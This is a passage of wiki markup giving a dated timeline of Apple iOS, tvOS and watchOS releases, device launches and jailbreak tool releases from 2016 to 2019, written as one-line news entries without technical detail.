* 7 August -- iOS/iPadOS 13.0 beta 6, tvOS 13.0 beta 6 and watchOS 6.0 beta 6 released.&lt;br /&gt;
&lt;br /&gt;
=== July ===&lt;br /&gt;
* 30 July -- watchOS 6.0 beta 5 released.&lt;br /&gt;
* 29 July -- iOS/iPadOS 13.0 beta 5 and tvOS 13.0 beta 5 released.&lt;br /&gt;
* 22 July -- iOS 12.4, iOS 10.3.4 for [[iPad (4th generation)]] and [[iPhone 5]], iOS 9.3.6 for [[K95AP|iPad2,3]], [[iPad mini|iPad2,6 iPad2,7]] [[iPad (3rd generation)|iPad3,2 iPad3,3]] and [[N94AP|iPhone 4s]], tvOS 12.4, watchOS 5.3, audioOS 12.4, and iBridge 3.6 released.&lt;br /&gt;
* 17 July -- iOS/iPadOS 13.0 beta 4, tvOS 13.0 beta 4 and watchOS 6.0 beta 4 released.&lt;br /&gt;
* 16 July -- iOS 12.4 beta 7, and watchOS 5.3 beta 6 released.&lt;br /&gt;
* 14 July -- [[Chimera]] updated to 1.2.3 to include support for some iOS 12.3 betas on A9-A11 devices. It was also updated to 1.2.2 for Apple TV 4K support up to tvOS 12.2.&lt;br /&gt;
* 12 July -- [[Chimera]] updated to 1.2.0 to include support for iOS 12.1.3-12.2 on A9-A11 devices.&lt;br /&gt;
* 11 July -- [[unc0ver]] updated to v3.3.0~b1 to include support for iOS 12.1.3-12.2 on A7-A11 devices.&lt;br /&gt;
* 9 July -- iOS 12.4 beta 6 and watchOS 5.3 beta 5 released.&lt;br /&gt;
* 8 July -- iOS/iPadOS 13.0 beta 3 (17A5522g) released.&lt;br /&gt;
* 2 July -- iOS/iPadOS 13.0 beta 3 (17A5522f), tvOS 13.0 beta 3 and watchOS 6.0 beta 3 released.&lt;br /&gt;
&lt;br /&gt;
=== June ===&lt;br /&gt;
* 24 June -- iOS 12.4 beta 5 and watchOS 5.3 beta 4 released.&lt;br /&gt;
* 17 June -- iOS/iPadOS 13.0 beta 2, tvOS 13.0 beta 2 and watchOS 6.0 beta 2 released.&lt;br /&gt;
* 11 June -- iOS 12.4 beta 4, tvOS 12.4 beta 3 and watchOS 5.3 beta 3 released.&lt;br /&gt;
* 10 June -- iOS 12.3.2 for [[iPhone 8 Plus]] released.&lt;br /&gt;
* 3 June -- [[WWDC]] 2019. iOS/iPadOS 13.0 beta, tvOS 13.0 beta and watchOS 6.0 beta released.&lt;br /&gt;
&lt;br /&gt;
=== May ===&lt;br /&gt;
* 29 May -- iOS 12.3.1 (16F8202) IPSW released for [[N112AP|iPod touch (7th generation)]].&lt;br /&gt;
* 28 May -- [[N112AP|iPod touch (7th generation)]] announced and available to order. iOS 12.3.1 (16F8202) OTA released for it. iOS 12.4 beta 3, tvOS 12.4 beta 2, and watchOS 5.3 beta 2 released.&lt;br /&gt;
* 24 May -- iOS 12.3.1 released.&lt;br /&gt;
* 20 May -- iOS 12.4 beta 2 released.&lt;br /&gt;
* 15 May -- iOS 12.4 beta, tvOS 12.4 beta and watchOS 5.3 beta released.&lt;br /&gt;
* 13 May -- iOS 12.3, tvOS 12.3, watchOS 5.2.1, audioOS 12.3 and Apple TV Software 7.3 released.&lt;br /&gt;
* 10 May -- iOS 12.3 beta 6 released.&lt;br /&gt;
* 7 May -- iOS 12.3 beta 5, tvOS 12.3 beta 5, Apple TV Software 7.3 beta 4 and watchOS 5.2.1 beta 5 released.&lt;br /&gt;
&lt;br /&gt;
=== April ===&lt;br /&gt;
* 30 April -- [[Chimera]] jailbreak for all devices running iOS 12.0-12.1.2 and tvOS 12.0-12.1.1 released.&lt;br /&gt;
* 29 April -- iOS 12.3 beta 4, tvOS 12.3 beta 4, Apple TV Software 7.3 beta 3 and watchOS 5.2.1 beta 4 released.&lt;br /&gt;
* 22 April -- iOS 12.3 beta 3, tvOS 12.3 beta 3, Apple TV Software 7.3 beta 2 and watchOS 5.2.1 beta 3 released.&lt;br /&gt;
* 10 April -- tvOS 12.2.1 released.&lt;br /&gt;
* 8 April -- iOS 12.3 beta 2, tvOS 12.3 beta 2 and watchOS 5.2.1 beta 2 released.&lt;br /&gt;
&lt;br /&gt;
=== March ===&lt;br /&gt;
* 28 March -- watchOS 5.2.1 beta released.&lt;br /&gt;
* 27 March -- iOS 12.3 beta, tvOS 12.3 beta, Apple TV Software 7.3 beta and watchOS 5.2 released.&lt;br /&gt;
* 25 March -- iOS 12.2, tvOS 12.2 and audioOS 12.2 released.&lt;br /&gt;
* 20 March -- [[AirPods (2nd generation)]] revealed.&lt;br /&gt;
* 18 March -- [[iPad Air (3rd generation)]] and [[iPad mini (5th generation)]] revealed. iOS 12.2 beta 6, tvOS 12.2 beta 6 and watchOS 5.2 beta 6 released.&lt;br /&gt;
* 11 March -- iOS 12.2 beta 5, tvOS 12.2 beta 5 and watchOS 5.2 beta 5 released.&lt;br /&gt;
* 4 March -- iOS 12.2 beta 4, tvOS 12.2 beta 4 and watchOS 5.2 beta 4 released.&lt;br /&gt;
&lt;br /&gt;
=== February ===&lt;br /&gt;
* 20 February -- [[Electra]] updated to support jailbreaking tvOS 11.0-11.4.1.&lt;br /&gt;
* 19 February -- iOS 12.2 beta 3, tvOS 12.2 beta 3 and watchOS 5.2 beta 3 released.&lt;br /&gt;
* 7 February -- iOS 12.1.4 released.&lt;br /&gt;
* 4 February -- iOS 12.2 beta 2, tvOS 12.2 beta 2 and watchOS 5.2 beta 2 released.&lt;br /&gt;
&lt;br /&gt;
=== January ===&lt;br /&gt;
* 30 January -- [[Electra]] and [[unc0ver]] updated to support jailbreaking iOS 11.4 and 11.4.1.&lt;br /&gt;
* 24 January -- iOS 12.2 beta, tvOS 12.2 beta and watchOS 5.2 beta released.&lt;br /&gt;
* 22 January -- iOS 12.1.3, tvOS 12.1.2, watchOS 5.1.3 and audioOS 12.1.3 released.&lt;br /&gt;
* 10 January -- iOS 12.1.3 beta 4 released.&lt;br /&gt;
* 7 January -- iOS 12.1.3 beta 3, tvOS 12.1.2 beta 3 and watchOS 5.1.3 beta 3 released.&lt;br /&gt;
&lt;br /&gt;
== 2018 ==&lt;br /&gt;
=== December ===&lt;br /&gt;
* 20 December -- iOS 12.1.2 (16C104) released for iPhone.&lt;br /&gt;
* 19 December -- iOS 12.1.3 beta 2, tvOS 12.1.2 beta 2 and watchOS 5.1.3 beta 2 released.&lt;br /&gt;
* 17 December -- iOS 12.1.2 (16C101) released for iPhone.&lt;br /&gt;
* 10 December -- iOS 12.1.2 beta, tvOS 12.1.2 beta, and watchOS 5.1.3 beta released.&lt;br /&gt;
* 6 December -- watchOS 5.1.2 released.&lt;br /&gt;
* 5 December -- iOS 12.1.1, tvOS 12.1.1 and audioOS 12.1.1 released.&lt;br /&gt;
&lt;br /&gt;
=== November ===&lt;br /&gt;
* 29 November -- tvOS 12.1.1 beta 4 released.&lt;br /&gt;
* 15 November -- iOS 12.1.1 beta 3, tvOS 12.1.1 beta 3, and watchOS 5.1.2 beta 2 released.&lt;br /&gt;
* 7 November -- [[iPad Pro (11-inch)]], [[iPad Pro (12.9-inch) (3rd generation)]] and [[Apple Pencil (2nd generation)]] available for purchase. iOS 12.1.1 beta 2, tvOS 12.1.1 beta 2, and watchOS 5.1.2 beta released.&lt;br /&gt;
* 6 November -- iOS 12.1 (16B94) released for [[N841AP|iPhone XR]].&lt;br /&gt;
* 5 November -- watchOS 5.1.1 released.&lt;br /&gt;
&lt;br /&gt;
=== October ===&lt;br /&gt;
* 31 October -- iOS 12.1.1 beta and tvOS 12.1.1 beta released.&lt;br /&gt;
* 30 October -- [[iPad Pro (11-inch)]], [[iPad Pro (12.9-inch) (3rd generation)]] and [[Apple Pencil (2nd generation)]] announced and available for pre-order. iOS 12.1, tvOS 12.1 and watchOS 5.1 released.&lt;br /&gt;
* 26 October -- [[N841AP|iPhone XR]] available for purchase.&lt;br /&gt;
* 22 October -- iOS 12.1 beta 5, tvOS 12.1 beta 5 and watchOS 5.1 beta 5 released.&lt;br /&gt;
* 19 October -- [[N841AP|iPhone XR]] available for pre-order.&lt;br /&gt;
* 15 October -- iOS 12.1 beta 4, tvOS 12.1 beta 4 and watchOS 5.1 beta 4 released.&lt;br /&gt;
* 9 October -- iOS 12.1 beta 3, tvOS 12.1 beta 3 and watchOS 5.1 beta 3 released.&lt;br /&gt;
* 8 October -- iOS 12.0.1 released.&lt;br /&gt;
* 2 October -- iOS 12.1 beta 2, tvOS 12.1 beta 2 and watchOS 5.1 beta 2 released.&lt;br /&gt;
&lt;br /&gt;
=== September ===&lt;br /&gt;
* 27 September -- watchOS 5.0.1 released.&lt;br /&gt;
* 24 September -- tvOS 12.0.1 released. &lt;br /&gt;
* 21 September -- [[Apple Watch Series 4]], [[D321AP|iPhone XS]] and [[iPhone XS Max]] available for purchase.&lt;br /&gt;
* 18 September -- iOS 12.1 beta, tvOS 12.1 beta and watchOS 5.1 beta released.&lt;br /&gt;
* 17 September -- audioOS 12.0, iOS 12.0, tvOS 12.0 and watchOS 5.0 released.&lt;br /&gt;
* 14 September -- [[Apple Watch Series 4]], [[D321AP|iPhone XS]] and [[iPhone XS Max]] available for pre-order.&lt;br /&gt;
* 12 September -- [[Apple Watch Series 4]], [[N841AP|iPhone XR]], [[D321AP|iPhone XS]] and [[iPhone XS Max]] announced. iOS 12.0 [[Golden Master|GM]], tvOS 12.0 [[Golden Master|GM]] and watchOS 5.0 [[Golden Master|GM]] released.&lt;br /&gt;
&lt;br /&gt;
=== August ===&lt;br /&gt;
* 31 August -- iOS 12.0 beta 12, tvOS 12.0 beta 10 and watchOS 12.0 beta 10 released.&lt;br /&gt;
* 27 August -- iOS 12.0 beta 11 and tvOS 12.0 beta 9 released.&lt;br /&gt;
* 24 August -- watchOS 5.0 beta 9 released&lt;br /&gt;
* 23 August -- iOS 12.0 beta 10 released.&lt;br /&gt;
* 20 August -- iOS 12.0 beta 9, tvOS 12.0 beta 8 and watchOS 5.0 beta 8 released.&lt;br /&gt;
* 15 August -- iOS 12.0 beta 8 released.&lt;br /&gt;
* 13 August -- iOS 12.0 beta 7, tvOS 12.0 beta 7 and watchOS 5.0 beta 7 released.&lt;br /&gt;
* 6 August -- iOS 12.0 beta 6, tvOS 12.0 beta 6 and watchOS 5.0 beta 6 released.&lt;br /&gt;
&lt;br /&gt;
=== July ===&lt;br /&gt;
* 30 July -- iOS 12.0 beta 5, tvOS 12.0 beta 5 and watchOS 5.0 beta 5 released.&lt;br /&gt;
* 17 July -- iOS 12.0 beta 4, tvOS 12.0 beta 4 and watchOS 5.0 beta 4 released.&lt;br /&gt;
* 12 July -- [[Electra|ElectraTV]] released to jailbreak tvOS 11.2-11.3.&lt;br /&gt;
* 9 July -- audioOS 11.4.1, iOS 11.4.1, tvOS 11.4.1, and watchOS 4.3.2 released.&lt;br /&gt;
* 8 July -- [[backr00m]] released to jailbreak tvOS 10.2.2-11.1.&lt;br /&gt;
* 6 July -- [[Electra]] updated to jailbreak iOS 11.2-11.3.1.&lt;br /&gt;
* 3 July -- iOS 12.0 beta 3, tvOS 12.0 beta 3 and watchOS 5.0 beta 3 released.&lt;br /&gt;
* 2 July -- iOS 11.4.1 beta 5 released.&lt;br /&gt;
&lt;br /&gt;
=== June ===&lt;br /&gt;
* 25 June -- iOS 11.4.1 beta 4, tvOS 11.4.1 beta 4, and watchOS 4.3.2 beta 3 released.&lt;br /&gt;
* 19 June -- iOS 12.0 beta 2, tvOS 12.0 beta 2 and watchOS 5.0 beta 2 released.&lt;br /&gt;
* 18 June -- iOS 11.4.1 beta 3 and tvOS 11.4.1 beta 3 released.&lt;br /&gt;
* 13 June -- watchOS 4.3.2 beta 2 released.&lt;br /&gt;
* 11 June -- iOS 11.4.1 beta 2, tvOS 11.4.1 beta 2, and watchOS 5.0 beta (build 16R5283r) released.&lt;br /&gt;
* 4 June -- iOS 12.0 beta, tvOS 12.0 beta and watchOS 5.0 beta (build 16R5283q) released. [[WWDC]] event.&lt;br /&gt;
&lt;br /&gt;
=== May ===&lt;br /&gt;
* 30 May -- iOS 11.4.1 beta, tvOS 11.4.1 beta and watchOS 4.3.2 beta released.&lt;br /&gt;
* 29 May -- iOS 11.4, tvOS 11.4, watchOS 4.3.1 and audioOS 11.4 released.&lt;br /&gt;
* 17 May -- iOS 11.4 beta 6 released.&lt;br /&gt;
* 14 May -- iOS 11.4 beta 5, tvOS 11.4 beta 5 and watchOS 4.3.1 beta 5 released.&lt;br /&gt;
* 7 May -- iOS 11.4 beta 4, tvOS 11.4 beta 4 and watchOS 4.3.1 beta 4 released.&lt;br /&gt;
* 1 May -- iOS 11.4 beta 3, tvOS 11.4 beta 3 and watchOS 4.3.1 beta 3 released.&lt;br /&gt;
&lt;br /&gt;
=== April ===&lt;br /&gt;
* 24 April -- iOS 11.3.1 released.&lt;br /&gt;
* 16 April -- iOS 11.4 beta 2, tvOS 11.4 beta 2 and watchOS 4.3.1 beta 2 released.&lt;br /&gt;
* 2 April -- iOS 11.4 beta, tvOS 11.4 beta and watchOS 4.3.1 beta released.&lt;br /&gt;
&lt;br /&gt;
=== March ===&lt;br /&gt;
* 29 March -- audioOS 11.3, iOS 11.3, tvOS 11.3 and watchOS 4.3 released.&lt;br /&gt;
* 28 March -- iOS 11.3 for [[iPad (6th generation)]] released.&lt;br /&gt;
* 27 March -- [[iPad (6th generation)]] released.&lt;br /&gt;
* 20 March -- tvOS 11.3 beta 6 released.&lt;br /&gt;
* 16 March -- iOS 11.3 beta 6 and watchOS 4.3 beta 6 released.&lt;br /&gt;
* 12 March -- iOS 11.3 beta 5, tvOS 11.3 beta 5 and watchOS 4.3 beta 5 released.&lt;br /&gt;
* 6 March -- watchOS 4.3 beta 4 released.&lt;br /&gt;
* 5 March -- iOS 11.3 beta 4 and tvOS 11.3 beta 4 released.&lt;br /&gt;
&lt;br /&gt;
=== February ===&lt;br /&gt;
* 26 February -- [[Electra]] 1.0 and 1.0.1 released to the public. &lt;br /&gt;
* 21 February -- watchOS 4.3 beta 3 released.&lt;br /&gt;
* 20 February -- iOS 11.3 beta 3 and tvOS 11.3 beta 3 released.&lt;br /&gt;
* 19 February -- iOS 11.2.6, tvOS 11.2.6 and watchOS 4.2.3 released.&lt;br /&gt;
* 7 February -- watchOS 4.3 beta 2 released.&lt;br /&gt;
* 6 February -- iOS 11.3 beta 2, and tvOS 11.3 beta 2 released.&lt;br /&gt;
&lt;br /&gt;
=== January ===&lt;br /&gt;
* 25 January -- watchOS 4.3 beta released.&lt;br /&gt;
* 24 January -- iOS 11.3 beta and tvOS 11.3 beta released.&lt;br /&gt;
* 23 January -- iOS 11.2.5, tvOS 11.2.5, watchOS 4.2.2 and audioOS 11.2.5 beta 3 released.&lt;br /&gt;
* 19 January -- iOS 11.2.5 beta 7 and watchOS 4.2.2 beta 5 released.&lt;br /&gt;
* 17 January -- iOS 11.2.5 beta 6 and tvOS 11.2.5 beta 6 released.&lt;br /&gt;
* 12 January -- tvOS 11.2.5 beta 5 and [[Electra]] JB toolkit released.&lt;br /&gt;
* 11 January -- iOS 11.2.5 beta 5 released.&lt;br /&gt;
* 9 January -- iOS 11.2.5 beta 4, watchOS 4.2.2 beta 4 and tvOS 11.2.5 beta 4 released.&lt;br /&gt;
* 8 January -- iOS 11.2.2 released.&lt;br /&gt;
* 3 January -- iOS 11.2.5 beta 3, watchOS 4.2.2 beta 3 and tvOS 11.2.5 beta 3 released.&lt;br /&gt;
&lt;br /&gt;
== 2017 ==&lt;br /&gt;
=== December ===&lt;br /&gt;
* 24 December -- [[h3lix]] beta 1 released to jailbreak 32-bit devices running iOS 10.x.&lt;br /&gt;
* 19 December -- iOS 11.2.5 beta 2, watchOS 4.2.2 beta 2, audioOS 11.2.5 beta 2 and tvOS 11.2.5 beta 2 released. &lt;br /&gt;
* 13 December -- iOS 11.2.1 and tvOS 11.2.1 released. iOS 11.2.5 beta, watchOS 4.2.2 beta, tvOS 11.2.5 beta, and audioOS 11.2.5 beta also released.&lt;br /&gt;
* 5 December -- watchOS 4.2 released. &lt;br /&gt;
* 4 December -- tvOS 11.2 released. &lt;br /&gt;
* 2 December -- iOS 11.2 released. &lt;br /&gt;
* 1 December -- iOS 11.2 beta 6 released.&lt;br /&gt;
&lt;br /&gt;
=== November ===&lt;br /&gt;
* 28 November -- iOS 11.2 beta 5 and tvOS 11.2 beta 5 released.&lt;br /&gt;
* 17 November -- iOS 11.2 beta 4, tvOS 11.2 beta 4 and watchOS 11.2 beta 4 released.&lt;br /&gt;
* 16 November -- iOS 11.1.2 released.&lt;br /&gt;
* 13 November -- iOS 11.2 beta 3, tvOS 11.3 beta 3 and watchOS 4.2 beta 3 released.&lt;br /&gt;
* 9 November -- iOS 11.1.1 released.&lt;br /&gt;
* 6 November -- iOS 11.2 beta 2, tvOS 11.2 beta 2, watchOS 4.2 beta 2 and [[audioOS]] 11.2 beta 2 released.&lt;br /&gt;
* 3 November -- iPhone X released. iOS 11.2 beta 2 for [[iPhone X]] released.&lt;br /&gt;
&lt;br /&gt;
=== October ===&lt;br /&gt;
* 31 October -- iOS 11.1, tvOS 11.1 and watchOS 4.1 released.&lt;br /&gt;
* 30 October -- iOS 11.2 beta, tvOS 11.2 beta, watchOS 4.2 beta and [[audioOS]] 11.2 beta released.&lt;br /&gt;
* 23 October -- iOS 11.1 beta 5 and tvOS 11.1 beta 4 released.&lt;br /&gt;
* 20 October -- iOS 11.1 beta 4 and watchOS 4.1 beta 4 released.&lt;br /&gt;
* 16 October -- iOS 11.1 beta 3, tvOS 11.1 beta 3 and watchOS 4.1 beta 3 released.&lt;br /&gt;
* 15 October -- [[Saïgon]] jailbreak released in beta.&lt;br /&gt;
* 11 October -- iOS 11.0.3 released.&lt;br /&gt;
* 9 October -- iOS 11.1 beta 2, tvOS 11.1 beta 2 and watchOS 4.1 beta 2 released. &lt;br /&gt;
* 4 October -- watchOS 4.0.1 released.&lt;br /&gt;
* 3 October -- iOS 11.0.2 released.&lt;br /&gt;
&lt;br /&gt;
=== September ===&lt;br /&gt;
* 27 September -- iOS 11.1 beta, tvOS 11.1 beta and watchOS 4.1 beta released. &lt;br /&gt;
* 26 September -- iOS 11.0.1 released.&lt;br /&gt;
* 22 September -- [[Apple Watch Series 3]], [[Apple TV 4K]], [[iPhone 8]], and [[iPhone 8 Plus]] released.&lt;br /&gt;
* 19 September -- iOS 11.0, tvOS 11.0 and watchOS 4.0 released. [[EtasonJB]] released for iOS 8.4.1.&lt;br /&gt;
* 12 September -- iOS 11.0 [[Golden Master|GM]], tvOS 11.0 [[Golden Master|GM]] and watchOS 4.0 [[Golden Master|GM]] released. [[Apple Watch Series 3]], [[Apple TV 4K]], [[iPhone 8]], [[iPhone 8 Plus]] and [[iPhone X]] announced.&lt;br /&gt;
* 6 September -- iOS 11.0 beta 10 released.&lt;br /&gt;
* 5 September -- tvOS 11.0 beta 10 released.&lt;br /&gt;
&lt;br /&gt;
=== August ===&lt;br /&gt;
* 31 August -- iOS 11.0 beta 9 and tvOS 11.0 beta 9 released.&lt;br /&gt;
* 28 August -- iOS 11.0 beta 8, tvOS 11.0 beta 8 and watchOS 4.0 beta 8 released.&lt;br /&gt;
* 21 August -- iOS 11.0 beta 7, tvOS 11.0 beta 7 and watchOS 4.0 beta 7 released.&lt;br /&gt;
* 14 August -- iOS 11.0 beta 6, tvOS 11.0 beta 6 and watchOS 4.0 beta 6 released.&lt;br /&gt;
* 7 August -- iOS 11.0 beta 5, tvOS 11.0 beta 5 and watchOS 4.0 beta 5 released.&lt;br /&gt;
&lt;br /&gt;
=== July ===&lt;br /&gt;
* 24 July -- iOS 11.0 beta 4, tvOS 11.0 beta 4 and watchOS 4.0 beta 4 released. &lt;br /&gt;
* 19 July -- iOS 10.3.3, tvOS 10.2.2 and watchOS 3.2.3 released. &lt;br /&gt;
* 13 July -- watchOS 4.0 beta 3 released. &lt;br /&gt;
* 10 July -- iOS 11.0 beta 3 and tvOS 11.0 beta 3 released. &lt;br /&gt;
* 6 July -- tvOS 10.2.2 beta 5 released. &lt;br /&gt;
* 5 July -- iOS 10.3.3 beta 6 released.&lt;br /&gt;
&lt;br /&gt;
=== June ===&lt;br /&gt;
* 28 June -- iOS 10.3.3 beta 5 released.&lt;br /&gt;
* 26 June -- iOS 11.0 beta 2 (build 15A5304j), tvOS 11.0 beta 2 (build 15J5310h) and watchOS 3.2.3 beta 4 released. &lt;br /&gt;
* 22 June -- iOS 10.3.3 beta 4 and tvOS 10.2.2 beta 4 released.&lt;br /&gt;
* 21 June -- iOS 11.0 beta 2, tvOS 11.0 beta 2 and watchOS 4.0 beta 2 released. &lt;br /&gt;
* 13 June -- iOS 10.3.3 beta 3, tvOS 10.2.2 beta 3 and watchOS 3.2.3 beta 3 released.&lt;br /&gt;
* 7 June -- tvOS 11.0 beta (build 15J5284g) released.&lt;br /&gt;
* 5 June -- iOS 11.0 beta, tvOS 11.0 beta (build 15J5284e), watchOS 4.0 beta and iOS 10.3.2 for [[iPad Pro (12.9-inch) (2nd generation)]] and [[iPad Pro (10.5-inch)]] released.&lt;br /&gt;
&lt;br /&gt;
=== May ===&lt;br /&gt;
* 30 May -- iOS 10.3.3 beta 2, tvOS 10.2.2 beta 2 and watchOS 3.2.3 beta 2 released. &lt;br /&gt;
* 16 May -- iOS 10.3.3 beta, tvOS 10.2.2 beta and watchOS 3.2.3 beta released. &lt;br /&gt;
* 15 May -- iOS 10.3.2, tvOS 10.2.1 and watchOS 3.2.2 released. &lt;br /&gt;
* 4 May -- tvOS 10.2.1 beta 5 released.&lt;br /&gt;
&lt;br /&gt;
=== April ===&lt;br /&gt;
* 27 April -- iOS 10.3.2 beta 5 released. &lt;br /&gt;
* 24 April -- iOS 10.3.2 beta 4, watchOS 3.2.2 beta 4 and tvOS 10.2.1 beta 4 released. &lt;br /&gt;
* 17 April -- iOS 10.3.2 beta 3, watchOS 3.2.2 beta 3 and tvOS 10.2.1 beta 2 released. &lt;br /&gt;
* 11 April -- [[alloc8 Exploit]] released for all revisions of the [[iPhone 3GS]], along with [[ipwndfu]] as a tool to utilise this exploit.&lt;br /&gt;
* 10 April -- iOS 10.3.2 beta 2, watchOS 3.2.2 beta 2 and tvOS 10.2.1 beta 2 released.&lt;br /&gt;
* 3 April -- iOS 10.3.1 released.&lt;br /&gt;
&lt;br /&gt;
=== March ===&lt;br /&gt;
* 28 March -- iOS 10.3.2 beta, watchOS 3.2.2 beta and tvOS 10.2.1 beta released.&lt;br /&gt;
* 27 March -- iOS 10.3, watchOS 3.2 and tvOS 10.2 released. &lt;br /&gt;
* 24 March -- [[iPad (5th generation)]], 32GB/128GB [[iPhone SE (1st generation)]] and PRODUCT(RED) [[iPhone 7]] available for purchase.&lt;br /&gt;
* 21 March -- [[iPad (5th generation)]] and iPhone 7 (PRODUCT)RED Special Edition announced.&lt;br /&gt;
* 20 March -- watchOS 3.2 beta 7 released. &lt;br /&gt;
* 16 March -- iOS 10.3 beta 7 released.&lt;br /&gt;
* 14 March -- tvOS 10.2 beta 6 and watchOS 3.2 beta 6 released.&lt;br /&gt;
* 13 March -- iOS 10.3 beta 6 released.&lt;br /&gt;
* 8 March -- iOS 10.3 beta 5, tvOS 10.2 beta 5 and watchOS 3.2 beta 5 released.&lt;br /&gt;
&lt;br /&gt;
=== February ===&lt;br /&gt;
* 28 February -- tvOS 10.2 beta 4 released.&lt;br /&gt;
* 27 February -- iOS 10.3 beta 4 and watchOS 3.2 beta 4 released.&lt;br /&gt;
* 20 February -- iOS 10.3 beta 3, tvOS 10.2 beta 3 and watchOS 3.2 beta 3 released.&lt;br /&gt;
* 6 February -- iOS 10.3 beta 2, tvOS 10.2 beta 2 and watchOS 3.2 beta 2 released.&lt;br /&gt;
&lt;br /&gt;
=== January ===&lt;br /&gt;
* 30 January -- watchOS 3.2 beta released.&lt;br /&gt;
* 24 January -- iOS 10.3 beta and tvOS 10.2 beta released.&lt;br /&gt;
* 23 January -- iOS 10.2.1, watchOS 3.1.3 and tvOS 10.1.1 released.&lt;br /&gt;
* 12 January -- iOS 10.2.1 beta 4 released.&lt;br /&gt;
* 9 January -- iOS 10.2.1 beta 3, watchOS 3.1.3 beta 2 and tvOS 10.1.1 beta 2 released.&lt;br /&gt;
&lt;br /&gt;
== 2016 ==&lt;br /&gt;
=== December ===&lt;br /&gt;
* 21 December -- watchOS 3.1.3 beta released.&lt;br /&gt;
* 20 December -- iOS 10.2.1 beta 2 released.&lt;br /&gt;
* 14 December -- iOS 10.2.1 beta and tvOS 10.1.1 beta released.&lt;br /&gt;
* 13 December -- watchOS 3.1.1 retracted after reports of [[Apple Watch Series 2]] units bring bricked.&lt;br /&gt;
* 12 December -- iOS 10.2, tvOS 10.1, watchOS 3.1.1 and Apple TV iOS 7.2.2 released.&lt;br /&gt;
* 7 December -- iOS 10.2 beta 7 released. [[User:qwertyoruiop|qwertyoruiop]] releases [https://jbme.qwertyoruiop.com/ jbme] to re-enable the [[Pangu9]] jailbreak for iOS 9.3.3, as an alternative to the IPA.&lt;br /&gt;
* 6 December -- tvOS 10.1 beta 5 released.&lt;br /&gt;
* 5 December -- iOS 10.2 beta 6 and watchOS 3.1.1 beta 5 released.&lt;br /&gt;
* 2 December -- iOS 10.2 beta 5 released.&lt;br /&gt;
&lt;br /&gt;
=== November ===&lt;br /&gt;
* 30 November -- tvOS 10.1 beta 4 released.&lt;br /&gt;
* 28 November -- iOS 10.2 beta 4 and watchOS 3.1.1 beta 4 released.&lt;br /&gt;
* 15 November -- watchOS 3.1.1 beta 3 released.&lt;br /&gt;
* 14 November -- iOS 10.2 beta 3, tvOS 10.1 beta 3 and 10.0.1 released.&lt;br /&gt;
* 9 November -- iOS 10.1.1 (14B150) released via IPSW's only.&lt;br /&gt;
* 7 November -- iOS 10.2 beta 2, tvOS 10.1 beta 2 and watchOS 3.1.1 beta 2 released.&lt;br /&gt;
&lt;br /&gt;
=== October ===&lt;br /&gt;
* 31 October -- iOS 10.1.1, 10.2 beta, tvOS 10.1 beta and watchOS 3.1.1 beta released.&lt;br /&gt;
* 24 October -- iOS 10.1, tvOS 10.0.1 and watchOS 3.1 released.&lt;br /&gt;
* 20 October -- tvOS 10.0.1 beta 4 released.&lt;br /&gt;
* 19 October -- iOS 10.1 beta 5 for [[iPhone 7]] and [[iPhone 7 Plus]] released.&lt;br /&gt;
* 17 October -- iOS 10.0.3 for [[iPhone 7]] and [[iPhone 7 Plus]] and iOS 10.1 beta 4 released.&lt;br /&gt;
* 12 October -- watchOS 3.1 beta 3 released.&lt;br /&gt;
* 10 October -- iOS 10.1 beta 3 and tvOS 10.0.1 beta 3 released.&lt;br /&gt;
* 4 October -- iOS 10.1 beta 2, tvOS 10.0.1 beta 2 and watchOS 3.1 beta 2 released.&lt;br /&gt;
&lt;br /&gt;
=== September ===&lt;br /&gt;
* 23 September -- iOS 10.0.2 released.&lt;br /&gt;
* 21 September -- iOS 10.1 beta, tvOS 10.0.1 beta and watchOS 3.1 beta released.&lt;br /&gt;
* 13 September -- iOS 10.0.1, tvOS 10.0 and watchOS 3.0 released.&lt;br /&gt;
* 7 September -- iOS 10.0.1 [[Golden Master|GM]], tvOS 10.0 [[Golden Master|GM]] and watchOS 3.0 [[Golden Master|GM]] released. [[Apple Watch Series 1]], [[Apple Watch Series 2]], [[iPhone 7]], [[iPhone 7 Plus]] and [[B188AP|AirPods (1st generation)]] announced.&lt;br /&gt;
&lt;br /&gt;
=== August ===&lt;br /&gt;
* 26 August -- iOS 10.0 beta 8 and tvOS 10.0 beta 7 released.&lt;br /&gt;
* 25 August -- iOS 9.3.5 released.&lt;br /&gt;
* 19 August -- iOS 10.0 beta 7 released.&lt;br /&gt;
* 15 August -- iOS 10.0 beta 6, tvOS 10.0 beta 6 and watchOS 3.0 beta 6 released.&lt;br /&gt;
* 9 August -- iOS 10.0 beta 5, tvOS 10.0 beta 5 and watchOS 3.0 beta 5 released.&lt;br /&gt;
* 4 August -- iOS 9.3.4 released.&lt;br /&gt;
* 1 August -- iOS 10.0 beta 4, tvOS 10.0 beta 4 and watchOS 3.0 beta 4 released.&lt;br /&gt;
&lt;br /&gt;
=== July ===&lt;br /&gt;
* 29 July -- [[Pangu9]] for iOS 9.2-9.3.3 English version released.&lt;br /&gt;
* 24 July -- [[Pangu9]] for iOS 9.2-9.3.3 released.&lt;br /&gt;
* 18 July -- iOS 10.0 beta 3, tvOS 10.0 beta 3 and watchOS 3.0 beta 3, iOS 9.3.3, watchOS 2.2.2 and tvOS 9.2.2 released.&lt;br /&gt;
* 6 July -- iOS 9.3.3 beta 5 and tvOS 9.2.2 beta 5 released.&lt;br /&gt;
* 5 July -- iOS 10.0 beta 2, tvOS 10.0 beta 2 and watchOS 3.0 beta 2 released.&lt;br /&gt;
&lt;br /&gt;
=== June ===&lt;br /&gt;
* 29 June -- iOS 9.3.3 beta 4 and tvOS 9.2.2 beta 4 released.&lt;br /&gt;
* 21 June -- iOS 9.3.3 beta 3 and tvOS 9.2.2 beta 3 released.&lt;br /&gt;
* 13 June -- iOS 10.0 beta, tvOS 10.0 beta and watchOS 3.0 beta released.&lt;br /&gt;
* 6 June -- iOS 9.3.3 beta 2, tvOS 9.2.2 beta 2 and watchOS 2.2.2 beta released.&lt;br /&gt;
* 2 June -- iOS 9.3.2 (13F72) is released for the [[iPad Pro (9.7-inch)]].&lt;br /&gt;
&lt;br /&gt;
=== May ===&lt;br /&gt;
* 23 May -- iOS 9.3.3 beta and tvOS 9.2.2 beta released.&lt;br /&gt;
* 19 May -- iOS 9.3.2 is retracted for the [[iPad Pro (9.7-inch)]] due to a bug that may prevent usage, but continues to be [[SHSH|signed]].&lt;br /&gt;
* 16 May -- iOS 9.3.2, tvOS 9.2.1 and watchOS 2.2.1 released.&lt;br /&gt;
